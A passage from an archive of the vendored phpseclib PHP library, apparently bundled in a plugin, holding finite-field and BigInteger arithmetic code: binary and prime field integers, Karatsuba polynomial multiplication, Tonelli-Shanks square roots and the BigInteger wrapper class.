STR_PAD_LEFT) ^ str_pad($s, $length, "\0", STR_PAD_LEFT); } return [ltrim($q, "\0"), ltrim($r, "\0")]; } /** * Perform polynomial multiplation in the traditional way * * @return string * @link https://en.wikipedia.org/wiki/Finite_field_arithmetic#Multiplication */ private static function regularPolynomialMultiply($x, $y) { $precomputed = [ltrim($x, "\0")]; $x = strrev(BinaryField::base256ToBase2($x)); $y = strrev(BinaryField::base256ToBase2($y)); if (strlen($x) == strlen($y)) { $length = strlen($x); } else { $length = max(strlen($x), strlen($y)); $x = str_pad($x, $length, '0'); $y = str_pad($y, $length, '0'); } $result = str_repeat('0', 2 * $length - 1); $result = BinaryField::base2ToBase256($result); $size = strlen($result); $x = strrev($x); // precompute left shift 1 through 7 for ($i = 1; $i < 8; $i++) { $precomputed[$i] = BinaryField::base2ToBase256($x . str_repeat('0', $i)); } for ($i = 0; $i < strlen($y); $i++) { if ($y[$i] == '1') { $temp = $precomputed[$i & 7] . str_repeat("\0", $i >> 3); $result ^= str_pad($temp, $size, "\0", STR_PAD_LEFT); } } return $result; } /** * Perform polynomial multiplation * * Uses karatsuba multiplication to reduce x-bit multiplications to a series of 32-bit multiplications * * @return string * @link https://en.wikipedia.org/wiki/Karatsuba_algorithm */ private static function polynomialMultiply($x, $y) { if (strlen($x) == strlen($y)) { $length = strlen($x); } else { $length = max(strlen($x), strlen($y)); $x = str_pad($x, $length, "\0", STR_PAD_LEFT); $y = str_pad($y, $length, "\0", STR_PAD_LEFT); } switch (true) { case PHP_INT_SIZE == 8 && $length <= 4: return $length != 4 ? self::subMultiply(str_pad($x, 4, "\0", STR_PAD_LEFT), str_pad($y, 4, "\0", STR_PAD_LEFT)) : self::subMultiply($x, $y); case PHP_INT_SIZE == 4 || $length > 32: return self::regularPolynomialMultiply($x, $y); } $m = $length >> 1; $x1 = substr($x, 0, -$m); $x0 = substr($x, -$m); $y1 = substr($y, 0, -$m); $y0 = substr($y, -$m); $z2 = self::polynomialMultiply($x1, $y1); $z0 = self::polynomialMultiply($x0, $y0); $z1 = self::polynomialMultiply( self::subAdd2($x1, $x0), self::subAdd2($y1, $y0) ); $z1 = self::subAdd3($z1, $z2, $z0); $xy = self::subAdd3( $z2 . str_repeat("\0", 2 * $m), $z1 . str_repeat("\0", $m), $z0 ); return ltrim($xy, "\0"); } /** * Perform polynomial multiplication on 2x 32-bit numbers, returning * a 64-bit number * * @param string $x * @param string $y * @return string * @link https://www.bearssl.org/constanttime.html#ghash-for-gcm */ private static function subMultiply($x, $y) { $x = unpack('N', $x)[1]; $y = unpack('N', $y)[1]; $x0 = $x & 0x11111111; $x1 = $x & 0x22222222; $x2 = $x & 0x44444444; $x3 = $x & 0x88888888; $y0 = $y & 0x11111111; $y1 = $y & 0x22222222; $y2 = $y & 0x44444444; $y3 = $y & 0x88888888; $z0 = ($x0 * $y0) ^ ($x1 * $y3) ^ ($x2 * $y2) ^ ($x3 * $y1); $z1 = ($x0 * $y1) ^ ($x1 * $y0) ^ ($x2 * $y3) ^ ($x3 * $y2); $z2 = ($x0 * $y2) ^ ($x1 * $y1) ^ ($x2 * $y0) ^ ($x3 * $y3); $z3 = ($x0 * $y3) ^ ($x1 * $y2) ^ ($x2 * $y1) ^ ($x3 * $y0); $z0 &= 0x1111111111111111; $z1 &= 0x2222222222222222; $z2 &= 0x4444444444444444; $z3 &= -8608480567731124088; // 0x8888888888888888 gets interpreted as a float $z = $z0 | $z1 | $z2 | $z3; return pack('J', $z); } /** * Adds two numbers * * @param string $x * @param string $y * @return string */ private static function subAdd2($x, $y) { $length = max(strlen($x), strlen($y)); $x = str_pad($x, $length, "\0", STR_PAD_LEFT); $y = str_pad($y, $length, "\0", STR_PAD_LEFT); return $x ^ $y; } /** * Adds three numbers * * @param string $x * @param string $y * @return string */ private static function subAdd3($x, $y, $z) { $length = max(strlen($x), strlen($y), strlen($z)); $x = str_pad($x, $length, "\0", STR_PAD_LEFT); $y = str_pad($y, $length, "\0", STR_PAD_LEFT); $z = str_pad($z, $length, "\0", STR_PAD_LEFT); return $x ^ $y ^ $z; } /** * Adds two BinaryFieldIntegers. * * @return static */ public function add(self $y) { static::checkInstance($this, $y); $length = strlen(static::$modulo[$this->instanceID]); $x = str_pad($this->value, $length, "\0", STR_PAD_LEFT); $y = str_pad($y->value, $length, "\0", STR_PAD_LEFT); return new static($this->instanceID, $x ^ $y); } /** * Subtracts two BinaryFieldIntegers. * * @return static */ public function subtract(self $x) { return $this->add($x); } /** * Multiplies two BinaryFieldIntegers. * * @return static */ public function multiply(self $y) { static::checkInstance($this, $y); return new static($this->instanceID, static::polynomialMultiply($this->value, $y->value)); } /** * Returns the modular inverse of a BinaryFieldInteger * * @return static */ public function modInverse() { $remainder0 = static::$modulo[$this->instanceID]; $remainder1 = $this->value; if ($remainder1 == '') { return new static($this->instanceID); } $aux0 = "\0"; $aux1 = "\1"; while ($remainder1 != "\1") { list($q, $r) = static::polynomialDivide($remainder0, $remainder1); $remainder0 = $remainder1; $remainder1 = $r; // the auxiliary in row n is given by the sum of the auxiliary in // row n-2 and the product of the quotient and the auxiliary in row // n-1 $temp = static::polynomialMultiply($aux1, $q); $aux = str_pad($aux0, strlen($temp), "\0", STR_PAD_LEFT) ^ str_pad($temp, strlen($aux0), "\0", STR_PAD_LEFT); $aux0 = $aux1; $aux1 = $aux; } $temp = new static($this->instanceID); $temp->value = ltrim($aux1, "\0"); return $temp; } /** * Divides two PrimeFieldIntegers. * * @return static */ public function divide(self $x) { static::checkInstance($this, $x); $x = $x->modInverse(); return $this->multiply($x); } /** * Negate * * A negative number can be written as 0-12. With modulos, 0 is the same thing as the modulo * so 0-12 is the same thing as modulo-12 * * @return object */ public function negate() { $x = str_pad($this->value, strlen(static::$modulo[$this->instanceID]), "\0", STR_PAD_LEFT); return new static($this->instanceID, $x ^ static::$modulo[$this->instanceID]); } /** * Returns the modulo * * @return string */ public static function getModulo($instanceID) { return static::$modulo[$instanceID]; } /** * Converts an Integer to a byte string (eg. base-256). * * @return string */ public function toBytes() { return str_pad($this->value, strlen(static::$modulo[$this->instanceID]), "\0", STR_PAD_LEFT); } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ public function toHex() { return Strings::bin2hex($this->toBytes()); } /** * Converts an Integer to a bit string (eg. base-2). * * @return string */ public function toBits() { //return str_pad(BinaryField::base256ToBase2($this->value), strlen(static::$modulo[$this->instanceID]), '0', STR_PAD_LEFT); return BinaryField::base256ToBase2($this->value); } /** * Converts an Integer to a BigInteger * * @return string */ public function toBigInteger() { return new BigInteger($this->value, 256); } /** * __toString() magic method * */ public function __toString() { return (string) $this->toBigInteger(); } /** * __debugInfo() magic method * */ public function __debugInfo() { return ['value' => $this->toHex()]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/Common/FiniteField/Integer.php000064400000002000147600400120024352 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math\Common\FiniteField; /** * Finite Field Integer * * @author Jim Wigginton */ abstract class Integer implements \JsonSerializable { /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * PHP Serialize isn't supported because unserializing would require the factory be * serialized as well and that just sounds like too much * * @return array{hex: string} */ #[\ReturnTypeWillChange] public function jsonSerialize() { return ['hex' => $this->toHex(true)]; } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ abstract public function toHex(); } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/Common/FiniteField.php000064400000000567147600400120022775 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math\Common; /** * Finite Fields * * @author Jim Wigginton */ abstract class FiniteField { } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/PrimeField/Integer.php000064400000024225147600400120022775 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math\PrimeField; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BigInteger; use phpseclib3\Math\Common\FiniteField\Integer as Base; /** * Prime Finite Fields * * @author Jim Wigginton */ class Integer extends Base { /** * Holds the PrimeField's value * * @var BigInteger */ protected $value; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Holds the PrimeField's modulo * * @var array */ protected static $modulo; /** * Holds a pre-generated function to perform modulo reductions * * @var array */ protected static $reduce; /** * Zero * * @var BigInteger */ protected static $zero; /** * Default constructor * * @param int $instanceID */ public function __construct($instanceID, BigInteger $num = null) { $this->instanceID = $instanceID; if (!isset($num)) { $this->value = clone static::$zero[static::class]; } else { $reduce = static::$reduce[$instanceID]; $this->value = $reduce($num); } } /** * Set the modulo for a given instance * * @param int $instanceID * @return void */ public static function setModulo($instanceID, BigInteger $modulo) { static::$modulo[$instanceID] = $modulo; } /** * Set the modulo for a given instance * * @param int $instanceID * @return void */ public static function setRecurringModuloFunction($instanceID, callable $function) { static::$reduce[$instanceID] = $function; if (!isset(static::$zero[static::class])) { static::$zero[static::class] = new BigInteger(); } } /** * Delete the modulo for a given instance */ public static function cleanupCache($instanceID) { unset(static::$modulo[$instanceID]); unset(static::$reduce[$instanceID]); } /** * Returns the modulo * * @param int $instanceID * @return BigInteger */ public static function getModulo($instanceID) { return static::$modulo[$instanceID]; } /** * Tests a parameter to see if it's of the right instance * * Throws an exception if the incorrect class is being utilized * * @return void */ public static function checkInstance(self $x, self $y) { if ($x->instanceID != $y->instanceID) { throw new \UnexpectedValueException('The instances of the two PrimeField\Integer objects do not match'); } } /** * Tests the equality of two numbers. * * @return bool */ public function equals(self $x) { static::checkInstance($this, $x); return $this->value->equals($x->value); } /** * Compares two numbers. * * @return int */ public function compare(self $x) { static::checkInstance($this, $x); return $this->value->compare($x->value); } /** * Adds two PrimeFieldIntegers. * * @return static */ public function add(self $x) { static::checkInstance($this, $x); $temp = new static($this->instanceID); $temp->value = $this->value->add($x->value); if ($temp->value->compare(static::$modulo[$this->instanceID]) >= 0) { $temp->value = $temp->value->subtract(static::$modulo[$this->instanceID]); } return $temp; } /** * Subtracts two PrimeFieldIntegers. * * @return static */ public function subtract(self $x) { static::checkInstance($this, $x); $temp = new static($this->instanceID); $temp->value = $this->value->subtract($x->value); if ($temp->value->isNegative()) { $temp->value = $temp->value->add(static::$modulo[$this->instanceID]); } return $temp; } /** * Multiplies two PrimeFieldIntegers. * * @return static */ public function multiply(self $x) { static::checkInstance($this, $x); return new static($this->instanceID, $this->value->multiply($x->value)); } /** * Divides two PrimeFieldIntegers. * * @return static */ public function divide(self $x) { static::checkInstance($this, $x); $denominator = $x->value->modInverse(static::$modulo[$this->instanceID]); return new static($this->instanceID, $this->value->multiply($denominator)); } /** * Performs power operation on a PrimeFieldInteger. * * @return static */ public function pow(BigInteger $x) { $temp = new static($this->instanceID); $temp->value = $this->value->powMod($x, static::$modulo[$this->instanceID]); return $temp; } /** * Calculates the square root * * @link https://en.wikipedia.org/wiki/Tonelli%E2%80%93Shanks_algorithm * @return static|false */ public function squareRoot() { static $one, $two; if (!isset($one)) { $one = new BigInteger(1); $two = new BigInteger(2); } $reduce = static::$reduce[$this->instanceID]; $p_1 = static::$modulo[$this->instanceID]->subtract($one); $q = clone $p_1; $s = BigInteger::scan1divide($q); list($pow) = $p_1->divide($two); for ($z = $one; !$z->equals(static::$modulo[$this->instanceID]); $z = $z->add($one)) { $temp = $z->powMod($pow, static::$modulo[$this->instanceID]); if ($temp->equals($p_1)) { break; } } $m = new BigInteger($s); $c = $z->powMod($q, static::$modulo[$this->instanceID]); $t = $this->value->powMod($q, static::$modulo[$this->instanceID]); list($temp) = $q->add($one)->divide($two); $r = $this->value->powMod($temp, static::$modulo[$this->instanceID]); while (!$t->equals($one)) { for ($i = clone $one; $i->compare($m) < 0; $i = $i->add($one)) { if ($t->powMod($two->pow($i), static::$modulo[$this->instanceID])->equals($one)) { break; } } if ($i->compare($m) == 0) { return false; } $b = $c->powMod($two->pow($m->subtract($i)->subtract($one)), static::$modulo[$this->instanceID]); $m = $i; $c = $reduce($b->multiply($b)); $t = $reduce($t->multiply($c)); $r = $reduce($r->multiply($b)); } return new static($this->instanceID, $r); } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value->isOdd(); } /** * Negate * * A negative number can be written as 0-12. With modulos, 0 is the same thing as the modulo * so 0-12 is the same thing as modulo-12 * * @return static */ public function negate() { return new static($this->instanceID, static::$modulo[$this->instanceID]->subtract($this->value)); } /** * Converts an Integer to a byte string (eg. base-256). * * @return string */ public function toBytes() { if (isset(static::$modulo[$this->instanceID])) { $length = static::$modulo[$this->instanceID]->getLengthInBytes(); return str_pad($this->value->toBytes(), $length, "\0", STR_PAD_LEFT); } return $this->value->toBytes(); } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ public function toHex() { return Strings::bin2hex($this->toBytes()); } /** * Converts an Integer to a bit string (eg. base-2). * * @return string */ public function toBits() { // return $this->value->toBits(); static $length; if (!isset($length)) { $length = static::$modulo[$this->instanceID]->getLength(); } return str_pad($this->value->toBits(), $length, '0', STR_PAD_LEFT); } /** * Returns the w-ary non-adjacent form (wNAF) * * @param int $w optional * @return array */ public function getNAF($w = 1) { $w++; $mask = new BigInteger((1 << $w) - 1); $sub = new BigInteger(1 << $w); //$sub = new BigInteger(1 << ($w - 1)); $d = $this->toBigInteger(); $d_i = []; $i = 0; while ($d->compare(static::$zero[static::class]) > 0) { if ($d->isOdd()) { // start mods $bigInteger = $d->testBit($w - 1) ? $d->bitwise_and($mask)->subtract($sub) : //$sub->subtract($d->bitwise_and($mask)) : $d->bitwise_and($mask); // end mods $d = $d->subtract($bigInteger); $d_i[$i] = (int) $bigInteger->toString(); } else { $d_i[$i] = 0; } $shift = !$d->equals(static::$zero[static::class]) && $d->bitwise_and($mask)->equals(static::$zero[static::class]) ? $w : 1; // $w or $w + 1? $d = $d->bitwise_rightShift($shift); while (--$shift > 0) { $d_i[++$i] = 0; } $i++; } return $d_i; } /** * Converts an Integer to a BigInteger * * @return BigInteger */ public function toBigInteger() { return clone $this->value; } /** * __toString() magic method * * @return string */ public function __toString() { return (string) $this->value; } /** * __debugInfo() magic method * * @return array */ public function __debugInfo() { return ['value' => $this->toHex()]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/PrimeField.php000064400000005126147600400120021377 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math; use phpseclib3\Math\Common\FiniteField; use phpseclib3\Math\PrimeField\Integer; /** * Prime Finite Fields * * @author Jim Wigginton */ class PrimeField extends FiniteField { /** * Instance Counter * * @var int */ private static $instanceCounter = 0; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Default constructor */ public function __construct(BigInteger $modulo) { if (!$modulo->isPrime()) { throw new \UnexpectedValueException('PrimeField requires a prime number be passed to the constructor'); } $this->instanceID = self::$instanceCounter++; Integer::setModulo($this->instanceID, $modulo); Integer::setRecurringModuloFunction($this->instanceID, $modulo->createRecurringModuloFunction()); } /** * Use a custom defined modular reduction function * * @return void */ public function setReduction(\Closure $func) { $this->reduce = $func->bindTo($this, $this); } /** * Returns an instance of a dynamically generated PrimeFieldInteger class * * @return Integer */ public function newInteger(BigInteger $num) { return new Integer($this->instanceID, $num); } /** * Returns an integer on the finite field between one and the prime modulo * * @return Integer */ public function randomInteger() { static $one; if (!isset($one)) { $one = new BigInteger(1); } return new Integer($this->instanceID, BigInteger::randomRange($one, Integer::getModulo($this->instanceID))); } /** * Returns the length of the modulo in bytes * * @return int */ public function getLengthInBytes() { return Integer::getModulo($this->instanceID)->getLengthInBytes(); } /** * Returns the length of the modulo in bits * * @return int */ public function getLength() { return Integer::getModulo($this->instanceID)->getLength(); } /** * Destructor */ public function __destruct() { Integer::cleanupCache($this->instanceID); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger.php000064400000053375147600400120021407 0ustar00 * add($b); * * echo $c->toString(); // outputs 5 * ?> * * * @author Jim Wigginton * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Math\BigInteger\Engines\Engine; /** * Pure-PHP arbitrary precision integer arithmetic library. Supports base-2, base-10, base-16, and base-256 * numbers. * * @author Jim Wigginton */ class BigInteger implements \JsonSerializable { /** * Main Engine * * @var class-string */ private static $mainEngine; /** * Selected Engines * * @var list */ private static $engines; /** * The actual BigInteger object * * @var object */ private $value; /** * Mode independent value used for serialization. * * @see self::__sleep() * @see self::__wakeup() * @var string */ private $hex; /** * Precision (used only for serialization) * * @see self::__sleep() * @see self::__wakeup() * @var int */ private $precision; /** * Sets engine type. * * Throws an exception if the type is invalid * * @param string $main * @param list $modexps optional * @return void */ public static function setEngine($main, array $modexps = ['DefaultEngine']) { self::$engines = []; $fqmain = 'phpseclib3\\Math\\BigInteger\\Engines\\' . $main; if (!class_exists($fqmain) || !method_exists($fqmain, 'isValidEngine')) { throw new \InvalidArgumentException("$main is not a valid engine"); } if (!$fqmain::isValidEngine()) { throw new BadConfigurationException("$main is not setup correctly on this system"); } /** @var class-string $fqmain */ self::$mainEngine = $fqmain; $found = false; foreach ($modexps as $modexp) { try { $fqmain::setModExpEngine($modexp); $found = true; break; } catch (\Exception $e) { } } if (!$found) { throw new BadConfigurationException("No valid modular exponentiation engine found for $main"); } self::$engines = [$main, $modexp]; } /** * Returns the engine type * * @return string[] */ public static function getEngine() { self::initialize_static_variables(); return self::$engines; } /** * Initialize static variables */ private static function initialize_static_variables() { if (!isset(self::$mainEngine)) { $engines = [ ['GMP', ['DefaultEngine']], ['PHP64', ['OpenSSL']], ['BCMath', ['OpenSSL']], ['PHP32', ['OpenSSL']], ['PHP64', ['DefaultEngine']], ['PHP32', ['DefaultEngine']] ]; foreach ($engines as $engine) { try { self::setEngine($engine[0], $engine[1]); return; } catch (\Exception $e) { } } throw new \UnexpectedValueException('No valid BigInteger found. This is only possible when JIT is enabled on Windows and neither the GMP or BCMath extensions are available so either disable JIT or install GMP / BCMath'); } } /** * Converts base-2, base-10, base-16, and binary strings (base-256) to BigIntegers. * * If the second parameter - $base - is negative, then it will be assumed that the number's are encoded using * two's compliment. The sole exception to this is -10, which is treated the same as 10 is. * * @param string|int|BigInteger\Engines\Engine $x Base-10 number or base-$base number if $base set. * @param int $base */ public function __construct($x = 0, $base = 10) { self::initialize_static_variables(); if ($x instanceof self::$mainEngine) { $this->value = clone $x; } elseif ($x instanceof BigInteger\Engines\Engine) { $this->value = new static("$x"); $this->value->setPrecision($x->getPrecision()); } else { $this->value = new self::$mainEngine($x, $base); } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { return $this->value->toString(); } /** * __toString() magic method */ public function __toString() { return (string)$this->value; } /** * __debugInfo() magic method * * Will be called, automatically, when print_r() or var_dump() are called */ public function __debugInfo() { return $this->value->__debugInfo(); } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = false) { return $this->value->toBytes($twos_compliment); } /** * Converts a BigInteger to a hex string (eg. base-16). * * @param bool $twos_compliment * @return string */ public function toHex($twos_compliment = false) { return $this->value->toHex($twos_compliment); } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = false) { return $this->value->toBits($twos_compliment); } /** * Adds two BigIntegers. * * @param BigInteger $y * @return BigInteger */ public function add(BigInteger $y) { return new static($this->value->add($y->value)); } /** * Subtracts two BigIntegers. * * @param BigInteger $y * @return BigInteger */ public function subtract(BigInteger $y) { return new static($this->value->subtract($y->value)); } /** * Multiplies two BigIntegers * * @param BigInteger $x * @return BigInteger */ public function multiply(BigInteger $x) { return new static($this->value->multiply($x->value)); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * Here's an example: * * divide($b); * * echo $quotient->toString(); // outputs 0 * echo "\r\n"; * echo $remainder->toString(); // outputs 10 * ?> * * * @param BigInteger $y * @return BigInteger[] */ public function divide(BigInteger $y) { list($q, $r) = $this->value->divide($y->value); return [ new static($q), new static($r) ]; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BigInteger $n * @return BigInteger */ public function modInverse(BigInteger $n) { return new static($this->value->modInverse($n->value)); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BigInteger $n * @return BigInteger[] */ public function extendedGCD(BigInteger $n) { extract($this->value->extendedGCD($n->value)); /** * @var BigInteger $gcd * @var BigInteger $x * @var BigInteger $y */ return [ 'gcd' => new static($gcd), 'x' => new static($x), 'y' => new static($y) ]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param BigInteger $n * @return BigInteger */ public function gcd(BigInteger $n) { return new static($this->value->gcd($n->value)); } /** * Absolute value. * * @return BigInteger */ public function abs() { return new static($this->value->abs()); } /** * Set Precision * * Some bitwise operations give different results depending on the precision being used. Examples include left * shift, not, and rotates. * * @param int $bits */ public function setPrecision($bits) { $this->value->setPrecision($bits); } /** * Get Precision * * Returns the precision if it exists, false if it doesn't * * @return int|bool */ public function getPrecision() { return $this->value->getPrecision(); } /** * Serialize * * Will be called, automatically, when serialize() is called on a BigInteger object. * * __sleep() / __wakeup() have been around since PHP 4.0 * * \Serializable was introduced in PHP 5.1 and deprecated in PHP 8.1: * https://wiki.php.net/rfc/phase_out_serializable * * __serialize() / __unserialize() were introduced in PHP 7.4: * https://wiki.php.net/rfc/custom_object_serialization * * @return array */ public function __sleep() { $this->hex = $this->toHex(true); $vars = ['hex']; if ($this->getPrecision() > 0) { $vars[] = 'precision'; } return $vars; } /** * Serialize * * Will be called, automatically, when unserialize() is called on a BigInteger object. */ public function __wakeup() { $temp = new static($this->hex, -16); $this->value = $temp->value; if ($this->precision > 0) { // recalculate $this->bitmask $this->setPrecision($this->precision); } } /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * @return array{hex: string, precision?: int] */ #[\ReturnTypeWillChange] public function jsonSerialize() { $result = ['hex' => $this->toHex(true)]; if ($this->precision > 0) { $result['precision'] = $this->getPrecision(); } return $result; } /** * Performs modular exponentiation. * * @param BigInteger $e * @param BigInteger $n * @return BigInteger */ public function powMod(BigInteger $e, BigInteger $n) { return new static($this->value->powMod($e->value, $n->value)); } /** * Performs modular exponentiation. * * @param BigInteger $e * @param BigInteger $n * @return BigInteger */ public function modPow(BigInteger $e, BigInteger $n) { return new static($this->value->modPow($e->value, $n->value)); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param BigInteger $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(BigInteger $y) { return $this->value->compare($y->value); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param BigInteger $x * @return bool */ public function equals(BigInteger $x) { return $this->value->equals($x->value); } /** * Logical Not * * @return BigInteger */ public function bitwise_not() { return new static($this->value->bitwise_not()); } /** * Logical And * * @param BigInteger $x * @return BigInteger */ public function bitwise_and(BigInteger $x) { return new static($this->value->bitwise_and($x->value)); } /** * Logical Or * * @param BigInteger $x * @return BigInteger */ public function bitwise_or(BigInteger $x) { return new static($this->value->bitwise_or($x->value)); } /** * Logical Exclusive Or * * @param BigInteger $x * @return BigInteger */ public function bitwise_xor(BigInteger $x) { return new static($this->value->bitwise_xor($x->value)); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return BigInteger */ public function bitwise_rightShift($shift) { return new static($this->value->bitwise_rightShift($shift)); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return BigInteger */ public function bitwise_leftShift($shift) { return new static($this->value->bitwise_leftShift($shift)); } /** * Logical Left Rotate * * Instead of the top x bits being dropped they're appended to the shifted bit string. * * @param int $shift * @return BigInteger */ public function bitwise_leftRotate($shift) { return new static($this->value->bitwise_leftRotate($shift)); } /** * Logical Right Rotate * * Instead of the bottom x bits being dropped they're prepended to the shifted bit string. * * @param int $shift * @return BigInteger */ public function bitwise_rightRotate($shift) { return new static($this->value->bitwise_rightRotate($shift)); } /** * Returns the smallest and largest n-bit number * * @param int $bits * @return BigInteger[] */ public static function minMaxBits($bits) { self::initialize_static_variables(); $class = self::$mainEngine; extract($class::minMaxBits($bits)); /** @var BigInteger $min * @var BigInteger $max */ return [ 'min' => new static($min), 'max' => new static($max) ]; } /** * Return the size of a BigInteger in bits * * @return int */ public function getLength() { return $this->value->getLength(); } /** * Return the size of a BigInteger in bytes * * @return int */ public function getLengthInBytes() { return $this->value->getLengthInBytes(); } /** * Generates a random number of a certain size * * Bit length is equal to $size * * @param int $size * @return BigInteger */ public static function random($size) { self::initialize_static_variables(); $class = self::$mainEngine; return new static($class::random($size)); } /** * Generates a random prime number of a certain size * * Bit length is equal to $size * * @param int $size * @return BigInteger */ public static function randomPrime($size) { self::initialize_static_variables(); $class = self::$mainEngine; return new static($class::randomPrime($size)); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param BigInteger $min * @param BigInteger $max * @return false|BigInteger */ public static function randomRangePrime(BigInteger $min, BigInteger $max) { $class = self::$mainEngine; return new static($class::randomRangePrime($min->value, $max->value)); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param BigInteger $min * @param BigInteger $max * @return BigInteger */ public static function randomRange(BigInteger $min, BigInteger $max) { $class = self::$mainEngine; return new static($class::randomRange($min->value, $max->value)); } /** * Checks a numer to see if it's prime * * Assuming the $t parameter is not set, this function has an error rate of 2**-80. The main motivation for the * $t parameter is distributability. BigInteger::randomPrime() can be distributed across multiple pageloads * on a website instead of just one. * * @param int|bool $t * @return bool */ public function isPrime($t = false) { return $this->value->isPrime($t); } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * @param int $n optional * @return BigInteger */ public function root($n = 2) { return new static($this->value->root($n)); } /** * Performs exponentiation. * * @param BigInteger $n * @return BigInteger */ public function pow(BigInteger $n) { return new static($this->value->pow($n->value)); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param BigInteger ...$nums * @return BigInteger */ public static function min(BigInteger ...$nums) { $class = self::$mainEngine; $nums = array_map(function ($num) { return $num->value; }, $nums); return new static($class::min(...$nums)); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param BigInteger ...$nums * @return BigInteger */ public static function max(BigInteger ...$nums) { $class = self::$mainEngine; $nums = array_map(function ($num) { return $num->value; }, $nums); return new static($class::max(...$nums)); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param BigInteger $min * @param BigInteger $max * @return bool */ public function between(BigInteger $min, BigInteger $max) { return $this->value->between($min->value, $max->value); } /** * Clone */ public function __clone() { $this->value = clone $this->value; } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value->isOdd(); } /** * Tests if a bit is set * * @param int $x * @return bool */ public function testBit($x) { return $this->value->testBit($x); } /** * Is Negative? * * @return bool */ public function isNegative() { return $this->value->isNegative(); } /** * Negate * * Given $k, returns -$k * * @return BigInteger */ public function negate() { return new static($this->value->negate()); } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param BigInteger $r * @return int */ public static function scan1divide(BigInteger $r) { $class = self::$mainEngine; return $class::scan1divide($r->value); } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $func = $this->value->createRecurringModuloFunction(); return function (BigInteger $x) use ($func) { return new static($func($x->value)); }; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return BigInteger[] */ public function bitwise_split($split) { return array_map(function ($val) { return new static($val); }, $this->value->bitwise_split($split)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BinaryField.php000064400000013343147600400120021547 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BinaryField\Integer; use phpseclib3\Math\Common\FiniteField; /** * Binary Finite Fields * * @author Jim Wigginton */ class BinaryField extends FiniteField { /** * Instance Counter * * @var int */ private static $instanceCounter = 0; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** @var BigInteger */ private $randomMax; /** * Default constructor */ public function __construct(...$indices) { $m = array_shift($indices); if ($m > 571) { /* sect571r1 and sect571k1 are the largest binary curves that https://www.secg.org/sec2-v2.pdf defines altho theoretically there may be legit reasons to use binary finite fields with larger degrees imposing a limit on the maximum size is both reasonable and precedented. in particular, 